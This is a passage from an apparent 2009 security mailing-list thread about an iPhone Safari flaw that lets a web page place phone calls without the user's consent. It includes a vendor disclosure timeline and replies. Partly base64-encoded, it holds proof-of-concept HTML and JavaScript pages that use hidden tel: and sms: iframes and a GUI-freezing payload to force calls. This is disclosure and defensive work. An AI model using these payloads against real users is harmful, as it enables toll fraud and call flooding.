LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
